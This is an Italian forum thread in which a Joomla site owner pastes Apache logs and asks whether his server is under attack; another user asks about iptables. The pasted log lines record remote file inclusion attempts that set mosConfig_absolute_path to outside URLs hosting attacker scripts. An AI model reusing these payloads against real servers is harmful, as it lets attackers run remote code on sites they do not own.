apache2 sotto attacco??

[marcogastaldell]

salve a tutti, ho creato un mio sito personale sul mio Ubuntu Hardy con apache2-php-mysql e joomla.

negli ultimi giorni trovo strani collegamenti da vari ip americani nel log di apache:

ecco uno dei tanti dall'access.log:
<206.53.51.240 - - [22/Jun/2008:20:14:41 +0200] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 369 "-" "libwww-perl/5.812">

e il corrispondente nell'error.log:
[Sun Jun 22 20:14:41 2008] [error] [client 206.53.51.240] File does not exist: /var/www/com_directory

ecco un'altro in access.log:
<91.186.11.35 - - [22/Jun/2008:18:38:29 +0200] "GET /joomla/index.php/tips-a-...sl-su-linux-kubuntuubuntu/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 404 1459 "-" "libwww-perl/5.812"
91.186.11.35 - - [22/Jun/2008:18:38:30 +0200] "GET /////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 1754 "-" "libwww-perl/5.812"
91.186.11.35 - - [22/Jun/2008:18:38:30 +0200] "GET /joomla/index.php/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 45596 "-" "libwww-perl/5.812"
89.248.101.69 - - [22/Jun/2008:18:39:58 +0200] "GET //index.php?mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 200 1754 "-" "libwww-perl/5.803"
72.232.217.138 - - [22/Jun/2008:18:40:47 +0200] "GET /joomla/index.php/tips-a-...sl-su-linux-kubuntuubuntu/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 404 1459 "-" "libwww-perl/5.810"
72.232.217.138 - - [22/Jun/2008:18:40:48 +0200] "GET /////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 1754 "-" "libwww-perl/5.810"
72.232.217.138 - - [22/Jun/2008:18:40:48 +0200] "GET /joomla/index.php/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 45596 "-" "libwww-perl/5.810"
91.186.11.35 - - [22/Jun/2008:19:09:33 +0200] "GET /joomla/index.php/tips-a-...sl-su-linux-kubuntuubuntu/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 404 1459 "-" "libwww-perl/5.812"
91.186.11.35 - - [22/Jun/2008:19:09:33 +0200] "GET /////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 1754 "-" "libwww-perl/5.812"
91.186.11.35 - - [22/Jun/2008:19:09:33 +0200] "GET /joomla/index.php/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 45612 "-" "libwww-perl/5.812"
72.232.217.138 - - [22/Jun/2008:19:13:41 +0200] "GET /joomla/index.php/tips-a-...sl-su-linux-kubuntuubuntu/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 404 1459 "-" "libwww-perl/5.810"
72.232.217.138 - - [22/Jun/2008:19:13:42 +0200] "GET /////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 1754 "-" "libwww-perl/5.810"
72.232.217.138 - - [22/Jun/2008:19:13:42 +0200] "GET /joomla/index.php/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 45612 "-" "libwww-perl/5.810">


e il corrispondente error.log:
<
[Sun Jun 22 18:38:30 2008] [error] [client 91.186.11.35] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 18:38:30 2008] [error] [client 91.186.11.35] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 18:40:48 2008] [error] [client 72.232.217.138] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 18:40:48 2008] [error] [client 72.232.217.138] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 19:09:33 2008] [error] [client 91.186.11.35] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 19:09:33 2008] [error] [client 91.186.11.35] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 19:13:42 2008] [error] [client 72.232.217.138] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 19:13:42 2008] [error] [client 72.232.217.138] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
>


Da quello che riesco a capire stanno cercando di usare il mio pc e il mio server apache per attaccare altri siti, sbaglio?

dall'access.log dove c'è: 404 369 sembrerebbe che abbia bloccato la cosa ma dove d'à ad esempio "200 1754" cosa ha fatto?
dall'error.log credo li abbia bloccati, ho ragione?

o è meglio se chiudo la porta 80?
:master:

[activ]

hai configurato iptables?

[marcogastaldell]

si tutto chiuso tranne la porta 80

ma da altre risposte sembra che stiano cercando di modificare il mio file di configurazione di joomla, per cambiare la mia pagina iniziale di joomlae puntare ad altre pagine esterne.

Ma fino ad ora senza successo


Sarebbe bello avendo gli ip fargli arrivare una bella denuncia!